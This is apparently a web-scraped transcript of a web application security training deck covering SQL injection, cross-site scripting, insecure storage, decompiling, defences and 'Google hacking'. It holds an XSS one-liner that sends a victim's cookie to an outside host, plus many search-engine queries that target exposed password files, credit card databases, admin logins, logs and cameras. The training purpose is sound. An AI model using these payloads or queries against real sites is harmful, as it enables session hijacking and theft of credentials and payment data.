Presentation is loading. Please wait.

Presentation is loading. Please wait.

Web Application Security. Agenda Attacks Types Web applications and Google What can be done?

Similar presentations


Presentation on theme: "Web Application Security. Agenda Attacks Types Web applications and Google What can be done?"— Presentation transcript:

1 Web Application Security

2 Agenda Attacks Types Web applications and Google What can be done?

3 Attack Types

4 Web Application Vulnerabilities (OWASP Top 10) Broken Access Control Broken Authentication and Session Management Buffer Overflows Denial of Service Insecure Configuration Management Poor Input Validation Injection Flaws (SQL Injection) Cross Site Scripting (XSS) Improper Error Handling Insecure Storage Reversing/decompiling

5 Attack Types Web Application Vulnerabilities Where can a web application be exploited? Inputs, outputs... Querystrings (www.ezenta.com/file.php?id=34) Form params (&name=sarid&phone= ) HTTP Headers Cookies Local Files? Anywhere a client has access to parameters

6 Web application Security SQL Injection

7 Attack Types SQL Injection The exploitation of weaknesses in a web application, ultimately enabling users to utlize functionality located within the database server framework.

8 Attack Types SQL Injection (Cont.) Who is vulnerable? MS SQL Oracle Sybase DB2 MySQL Mm. Not the fault of the database software but rather the fault of the developers that utilise these databases.

9 Attack Types SQL Injection (Cont.) What can happen? Information leakage Data manipulation: INSERT, UPDATE, DELETE, … Execution of Stored Procedures (i.e. MSSQL) Data theft What would you want if you were the attacker?

10 Attack Types SQL Injection (Cont.) How would an attacker launch an attack in an attempt to gain access to a web server/DB server? Prerequisites Some outbound trafic must be permitted, the user must know which port The databases user must be able to execute the EXEC command The attacker must have some server (TFTP/FTP) from shich files can be retrieved

11

12

13

14

15 Attack Types SQL Injection (Cont.) DEMO: Identifying vulnerabilities Gathering info. about the DB: name, structure Altering data Running commands Error based/blind SQL injection Stored Procedures

16 GAME OVER

17 Web application Security Cross Site Scripting (XSS)

18 Attack Types Cross Site Scripting (XSS) Attack aimed at the users of a web application, possible as a result of poor programming practices.

19 Attack Types Cross Site Scripting (Cont.) Two types: Transient: The exploit is composed and delivered. Is generally executed just the one time. Persistent: The exploit is composed and written to some data store. An example is a forum post.

20 Attack Types Cross Site Scripting (Cont.) Transient: The victim has to perform an action in order for the attack to work. Click on a link Download a file (eMule, Kazaa, Skype, MSN, …) Persistent: The attacked is executed simply by visiting the compromised web application.

21 Attack Types Cross Site Scripting (Cont.) So you can execute some script in the users browser, who cares? Right?

22 Attack Types Cross Site Scripting (Cont.) What can happen? Information known only to the user and the web server ( in this case session identifiers ) can be stolen. Sound scary? Consider this.... Ordering perscriptions over the net? Medical test results? On-line psychological consultations: Are you sure youre chatting to a doctor? Using netbank?

23 Attack Types Cross Site Scripting (Cont.) Net Bank Recently found a vulnerability that would enable an attacker to create a false net bank logon. When the user entered their username and password, the details were sent to a third server. This is real!

24 Attack Types Cross Site Scripting (Cont.) Who is vulnerable? JAVA.NET ASP PHP CF Mm. Its not MS, Suns, Allaires or Novells fault (not always). Its the fault of the developer!

25 Attack Types Cross Site Scripting (Cont.) How do users sessions get hijacked? A vulnerability is identified. An exploit is developed (as shown on next slide). The exploit is sent to the victim (transient) or posted in a vulnerable page (persistant). The user clicks on the link (tansient) or visits the vulnerable page (persistant). The users session identifier is sent to the attacker. The stolen session identifier is included in the attackers request ( shown in the demo ).

26 Attack Types Cross Site Scripting (Cont.) A simple transient XSS attack: window.open('http:// /write_to_file.o?Session='+docu ment.cookie,'obj_window','fullscreen=no,toolbar=no,status=no,me nubar=no,scrollbars=no,resizable=yes,directories=no,location=no, width=100,height=100'); All on one line.

27 Attack Types Cross Site Scripting (Cont.) How do users sessions get hijacked? A vulnerability is identified. An exploit is developed. The exploit is sent to the victim (transient) or posted in a vulnerable page (persistant). The user clicks on the link (tansient) or visits the vulnerable page (persistant). The users session identifier is sent to the attacker. The stolen session identifier is included in the attackers request ( shown in the demo ).

28

29

30

31

32 Attack Types Cross Site Scripting (Cont.) How do users sessions get hijacked? A vulnerability is identified. An exploit is developed. The exploit is sent to the victim (transient) or posted in a vulnerable page (persistant). The user clicks on the link (tansient) or visits the vulnerable page (persistant). The users session identifier is sent to the attacker. The stolen session identifier is incorporated into the attackers request ( shown in the demo ).

33

34

35

36

37

38 Attack Types Cross Site Scripting (Cont.) DEMO:

39 Web application Security Improper Error Handling

40 Attack Types Improper Error Handling Reading error messages in an attempt to gain an understanding of the platform and technologies deployed

41 Attack Types Improper Error Handling (Cont.) What can you learn from error messages? What database is being used If the developers are trying to hide what server side technology is being used (by associating *.abc files with the asp.dll), it can be disclosed here Usernames and passwords included in the connection string

42 Web application Security Insecure Storage

43 Attack Types Insecure Storage – What is it? The implementation of poor storage schemes used to store sensative information such as credit card details and the like

44 Attack Types Insecure Storage (cont.) How can this type of vulnerability be found? Google Comments in a pages source Error rmessages Filenames in temporary Mange more.

45 Attack Types Insecure Storage (cont.) What are we looking for…

46 Attack Types Insecure Storage (cont.) What other examples are there? Poor implementation of encryption algos Attempting to create your own encryption algo simple XOR methods

47 Attack Types Insecure Storage (cont.) Demo Password files "your password is" filetype:log allinurl:admin ext:mdb Credit card information allinurl:customers ext:mdb allinurl:shopping ext:mdb

48 Attack Types Reversing/decompiling Java and.NET can be decompiled The source code can be read What tools exist to enable this? Java: DJ Decompiler.NET: Salamander (http://www.remotesoft.com/salamander/)

49 Attack Types Reversing/decompiling (cont.) Differences between native code and VM Native code = ASM Java/.NET = the original code Native code DEMO Java/.NET DEMO

50 Attack Types Reversing/decompiling (cont.) Protection schemes for native code ASProtect ExeShield ACProtector Armadillo ExeCrypter PElock Can they then be broken? It seem like it What does the file now look like?

51 Attack Types Reversing/decompiling (cont.) Protection schemes for Java/.NET Obfuscation HASP Can they then be broken? What does the file now look like?

52 Attack Types Reversing/decompiling (cont.) What protection schemes do you use? Do they work?

53 Web application Security What can be done?

54 Who is responsible? Customers can make demands! Development houses can educate developers!

55 What can be done? Design Threat Modelling; Understanding the threats (covered on day 2): But we dont use sessions But we use SSL Code Reviews (briefly covered on day 2) Ask questions! Check lists Defence in depth Secure defaults

56 What can be done? Implementation Secure programming principles and practices, educate developers (Think like an attacker) Input validation Output validation/encoding Fail safely Perform peer code reviews Reuse code that is know to be secure.....

57 What can be done? Audit Perform automated testing as well as manual (some of the tools available are covered on day two) Test at every development stage Make a test plan Test all components

58 What can be done? Configuration Management The secure configuration of the implemented platform (covered on day 2)

59 Web application Security Web applications and Google

60 Googles advanced search operators Alternate query types cache link:www.ezenta.com related:www.securityfocus.com info:www.google.com Query Modifiers site:[ whitehouse.gov | ] allintitle:hacking tomcat intitle:hacking tomcat = intitle:hacking intext:tomcat allinurl:admin database inurl:admin database = intitle:admin intext:database

61 Web applications and Google Googles advanced search operators (cont.) Query Modifiers (cont.) filetype:doc ext:php (same as above) inanchor:funnystuff ( funnystuff ) numrange: or daterange: (represented in Julian time) phonebook:first last state

62 Web applications and Google What can you use this for? Error messages as shown earlier Password files Login pages Logs Shopping information Online devices Source code?

63 Web applications and Google Error messages as shown earlier Try and find error messages that you are familiar with by using Googles advanced operators

64 Web applications and Google Error messages as shown earlier A syntax error has occurred filetype:ihtml Incorrect syntax near Internal Server Error server at

65 Web applications and Google Password files Try and find some password details using Google

66 Web applications and Google Password files intitle:index of /etc intext:(passwd | shadow) inurl:admin ext:(mdb | log | pwd | tmp | txt | bak) intext:your password is * intext:please use the following username * and password *

67 Web applications and Google Login pages Find some login pages that you are familiar with

68 Web applications and Google Login pages allinurl:login admin cms "You have requested access to a restricted area of our website. Please authenticate yourself to continue. intitle:"Tomcat Server Administration"

69 Web applications and Google Logs Find some common log files using Google

70 Web applications and Google Logs inurl:log ext:(log | txt) inurl:admin ext:(log | txt) intitle:"index.of./ allinurl:logs ftp security

71 Web applications and Google Shopping information Shopping information exists on web sites and Google knows about it. Find it!

72 Web applications and Google Shopping information inurl:shop database Mastercard ext:(log | mdb | tmp | bak | txt) Visa ext:(log | mdb | tmp | bak | txt) Amex ext:(log | mdb | tmp | bak | txt)

73 Web applications and Google Online devices Do you use any online devices like WAPs? Find some online devices you are familiar with.

74 Web applications and Google Online devices intitle:"Live View / - AXIS intitle:webeye inurl:login.ml inurl:"printer/main.html" intext:"settings intitle:"Network Storage Link for USB 2.0 Disks" Firmware (http://173016th.com/)

75 Web applications and Google Source Code Find source code fragments with Google

76 Web applications and Google Source Code intext:"ADODB.Recordset" ext:inc inurl:index.php.bak

77 Web application Security Summary Bad programming can introduce huge issues Security awareness and education can help raise security Google can be used for data mining Keep your environment clean.

78 ?


Download ppt "Web Application Security. Agenda Attacks Types Web applications and Google What can be done?"

Similar presentations


Ads by Google